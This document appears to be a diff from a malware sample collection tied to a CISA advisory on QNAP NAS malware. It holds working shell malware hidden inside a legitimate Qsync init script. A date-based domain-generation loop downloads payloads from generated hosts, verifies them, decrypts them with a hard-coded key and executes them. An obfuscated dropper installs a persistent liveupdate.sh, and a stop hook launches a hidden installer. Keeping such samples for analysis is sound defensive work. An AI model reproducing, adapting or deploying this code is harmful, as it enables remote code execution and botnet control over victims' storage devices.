test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 0; }
|
||||
fi
|
||||
fi
|
630
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5130282cdb4e371b5b9257e6c992fb7c11243b2511a6d4185eafc0faa0e0a3a6
Normal file
630
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5130282cdb4e371b5b9257e6c992fb7c11243b2511a6d4185eafc0faa0e0a3a6
Normal file
@ -0,0 +1,630 @@
|
||||
#!/bin/sh
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
xdEIZP=${ChSqzKBSW}t${fndSX}r${RiADoEekYl}
|
||||
CHQOUaEF=${mKukBzqlFWte}${RcAgv}'\'${CzwGKoExdSNb}${oqEoH}; ZdBaYuwO=${uSWVs}${wtxOLMzrX}${zUlDx}${CHQOUaEF}${hnTYzqNIR}${WEJkC}${kMhyJjnAFI}133; FALbYHfu=${VZmgi}${VEElEOlov}${eDUDq}${CHQOUaEF}${iBBKUXigc}${QSddu}${JpoASfGrvy}055; ivTDLYcJ=${oVdmD}${BoQprMhPn}${ooVsb}${CHQOUaEF}${CYldesVQs}${AZyIt}${FImBFvbeBf}134; $xdEIZP 'O)sjM{bTXIL'$ivTDLYcJ'xq"}h*ig%PckK;\nE#Qm'$ZdBaYuwO'n'"'"'=So+Uu(W BvCarF!]N|'$FALbYHfu'YztG<HJ$RDVZedf`yAp&l>w' '{qjLaI` +F)'$ZdBaYuwO'cYsu]#%'$FALbYHfu'e;fNGk<Mx$pQO(UBy=VKTPb!g'"'"'*nJrv'$ivTDLYcJ'SX&zWwtR>\nmEhi"}A|lDHoZCd' << "cLgBgGVGUVG" | ${czsznolvy}s${oLDnn}h${RWzWuKOHEj}
|
||||
>p)yDAmrqz+QO<{>=D!d/V&QOnok rU[uuffAdR%/QOEH%>t!tk!dV<QO-jZw%nAFxHF!d<mQO<|%nx]mIR((rdw/QOjE&sKud"oQO;[#Evv%D>Z=H"tqd"y&QO}qEr kdv.xvQORFFSAxjlVHc-dZQO!K%>pKkstd$QOjKcUs Aud<!QOUAyHjzW}syU%dQOwtA|ERdTCTBR%`u NrfLFPWmckO]+aHIoJzyDUSAp(i<vE!bCeCeCM}n'sqYN055hj[N133l{w;K-"x&
|
||||
>N134#t=QeV|G*)ZdXrCTCVUMm`K(iN055aPECeCeCYNrJO{%=-)t'Z
|
||||
kLsp]+Ge&"dqryIvQ|>Hu;<Ao}nN134fxD Xw#N133*jBbThcRlSWz[F!C
|
||||
|
||||
e|A[F"ISm|AVeJQ>p)yDAmrqz$Nt/"zC/ETcn+CrEjrQJUQcOQcQQQQMvKRMQE(FcQQQQMvKRMQ|zC('O1:f4!FcQQQQMvKRMQ|R
|
||||
('O2:f12!FcQQQQMvKRMQhE%RK+(<'O3:fRfZ;fG!<cQQQQjrQf&KQ<'hE%RK+<QyQ/&+p/lrRC&v|Q`QOQcQQQQQQQQr+R&QfrCQ'JJ'Y;D[{PQ$QJQ'|R
|
||||
QfQ'|zCQxQ1QUQxQ'|zCQUUQEFcQQQQQQQQ+KTvQ<'E<cQQQQ!c!cKv||RC&QfpQ|hj+|%QkQ/&+p/ClMMQ2km1Q``Q|hj+|%QJUQOQcMvKRMQElVVz
|
||||
(=n+CrEjrQ6Q6=cj+EjQ<'2<QmmQOQ|h&zrQ<'O2$HHHHHH!'ElVVz
|
||||
<FQ+KTvQ<'O2$HHHHHH!'ElVVz
|
||||
<FQ!Q``QOQjvlKTQ<'O1$HHHHHH!'ElVVz
|
||||
<FQ+KTvQ<'O1$$HHHHHH!'ElVVz
|
||||
<FQ!c!c+
|
||||
+KQ2k/&+p/ClMMc); A(<'O); A!:/"zC:/E"zC:/lEr/"zC:/lEr/E"zC:/lEr/"zC/H11:/lEr/MvKRM/E"zC:/lEr/MvKRM/"zC<cj+EjQtQfZQ<'Oda-Yb_s Y]Du!<Q``QOQ%rzCjVQ<[Rj+:Q<FQ G(uP Q&Rj+FQ+
|
||||
zjQ0FQ!c+KTvQ<[Rj+:Qo+&Qs+%Q21Q19:48:17QuP Q2016<cKr(=%rzCjVQWwrWQ``Q+KTvQfC+QWwrW=cj+EjQ<'ONKr!<Qf+IQ1QmmQ+KTvQ<'Kr<Q``Q+KTvQ<<cj+EjQ<
|
||||
'A )_Y-}-Y-Y<Q(Q<
|
||||
&7298"47&745055&4V03&K507VR7K++VV&64+340<Q``Q+
|
||||
zjQ0cj+EjQtQfZQ<'O0!<QmmQj+EjQ=%EQRl
|
||||
Q`Qnr+%Q<'O0!<Q`QiKQfM=QfnjQ40QmmQ+
|
||||
zjQ0cKv||RC&QfpQv%+CEEMQk/&+p/ClMMQ2km1QmmQOc){s [; ;(WWch(<a;&|;4ZrBa3g9;SX;8{s&DRplA76aql2<cj+EjQ<
|
||||
'OY-da-s _P- A{[!<Q(Q
|
||||
){s QmmQj+EjQtQfZQ<'Oda-Yb_s Y]Du!<QmmQKRE+Q<'Oda-Yb_s Y]Du!<QzCQWWQ`QL>t0f9eLQ`Q0LQUQVRME+QFFQ>0f9e>0f9e>0f9e>0f9e>0f9e>0f9e>0f9e>0f9eQUQ&(<'JJQ=&Rj+Qx$E=Q/Q100QUU<FQj+EjQ<'Oda-Yb_s Y]Du!<Q(Q<'O&!<QmmQKj(<'&<Q``QOQj+EjQ<'Oda-Yb_s Y]Du!<Q(Q<'JJQ'&QfQ1UU<QmmQKj(<'JJQ'&QfQ1QUU<FQ!QFFQLUQVRME+QFFQ+ERKQmmQj+EjQtQfZQ<'Oda-Yb_s Y]Du!<QmmQOcCM(WcWcKRE+Q<'Oq{D -D _#-Du A!<QzCQWWQ`QL>t0f9eLQ`Q0LQUQVRME+QFFQLUQj+EjQ<'Oq{D -D _#-Du A!<QfMjQ2147483646QFFQ+ERKQmmQOQ]}s(Qr+R&Qf&QWWQfrCQ<'Oq{D -D _#-Du A!<Q){s [; ;FQj+EjQfZQ<'){s [; ;<QmmQ){s [; ;(=&&Q"E(1QKvlCj(<'q{D -D _#-Du A<Q2k/&+p/ClMM=FQ!Q``Qj+EjQ<'){s [; ;<Q``Q){s [; ;(=KRj=Q``Q+
|
||||
zjQ0cE(<'O){s [; ;NNL.!<cEj(<'OENNLf!<cE(<'OE$$fL!<c&(<'JJQ'&Q/Q1000QUU<cj+EjQtQfZQ<'&<QmmQj+EjQtQfZQ<'Ej<QmmQj+EjQ<'ONEj!<Q(Q5QmmQOQj+EjQ<
|
||||
'Ej<Q(Q<
|
||||
'&<Q``Qj+EjQ<
|
||||
'Ej<Q(Q<
|
||||
'JJQ'&QfQ1QUU<FQ!Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cKRE+Q<'E<QzCQWWQ`QL>tRfZ;fG0f9/x('CMeLQUQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQFFQ+ERKcj(=|hj+|%Q/j|%/.j|%.HHHHHH=Q``Q+
|
||||
zjQ0cKRjQkQ<'j<Qyy<-{}<Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cfffff*-u]DQ)a*#]qQg-bfffffcP]]*vS;D*nhIThzu9i0*;d-};;{q;b8;P]]*zngq;b-;\zuxA/1VK#PV Dapp*+Ec{XI06V{u|*}g]a{q)E\u%;lZ[rqgMC*lAv#4Ts-jCl
|
||||
*Dj8S;*Z&Gx%9Ia";G3{cZR)|X]&E1nAAM1g}xd8A5"D&DE9PqYh-pqanXu}+3;RM#7hxS/YH*EorE#qg&ugocRAx&jq0D&#g&hZTg8I*IZA
|
||||
qxPauZ++5//{n[g&Kg++MRqnZaXR0lz11*G3]Sg%dcM7AvhBA|\ZYrXu)KlK4hMA9"g4s+;[+TY\S\MzpAdKIsg1EDEiR%X|2I[S\d7TSYcY2ER{Zl" ai1x2dgMxP\5sV\v/*8Dv%Db6-;{#8bq)BAqR%I2RV2G\jTRB22B%VbcZjZS-\5{h}DT6VYnGD%"ElPl4C)R*/rnpX|Eo
|
||||
93RCET4]+Hz)\{lgB*R|aG\]p#c
|
||||
r2-sq2rTnoTInXlz#MAuxAPg63)v&*P}\gI9r#&4T99CH"9xzq|}d9VZXgE9ssPcS7
|
||||
R&u%R"g2RD %D3Z[;l-u]4G{jI
|
||||
#IoS-A|0"-xG5};nP*;;-(cfffff-D[Q)a*#]qQg-bfffffc-{}cj+EjQtQfZQ<'E<QmmQT(=v%+CEEMQ"RE+64Qf&Qyy-{}Q`Qv%+CEEMQrERljMQf%l"zCQfzCh+\Q<'j<Qfp+rzV\c'Ec-{}c=Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cj+EjQfVQ<'j<QmmQr|Q<'j<c|(<'O){s [; ;$$.L!<c){s [; ;(WWcKRE+Q<'|<QzCQWWQ`QL>tRfZ;fG0f9/x('CMeLQUQ+
|
||||
zjQ0QFFQ+ERKch(=v%+CEEMQ&nEjQfETR1Qf"zCRr\QfT|RKQ<'Kj<Qyy-{}Q`Qv%+CEEMQ"RE+64c'hc-{}c=c|(=v%+CEEMQ+CKQf&QfR+Ef256fK"KQfhQ<'h<Qf|&QETR1QfERMjQfRQyy-{}c'|c-{}c=c|T(=v%+CEEMQ&nEjQfETR1Qf"zCRr\QfT|RKQ<'Ej<Qyy-{}Q`Qv%+CEEMQ"RE+64c'|c-{}c=cj+EjQtQfZQ<'T<QmmQj+EjQ<'T<Q(Q<'|T<Q``Q+
|
||||
zjQ0c+pRMQ<'|<cjrl+c!Q``QOcj(=|hj+|%Q/j|%/.j|%.HHHHHH=Q``Q+
|
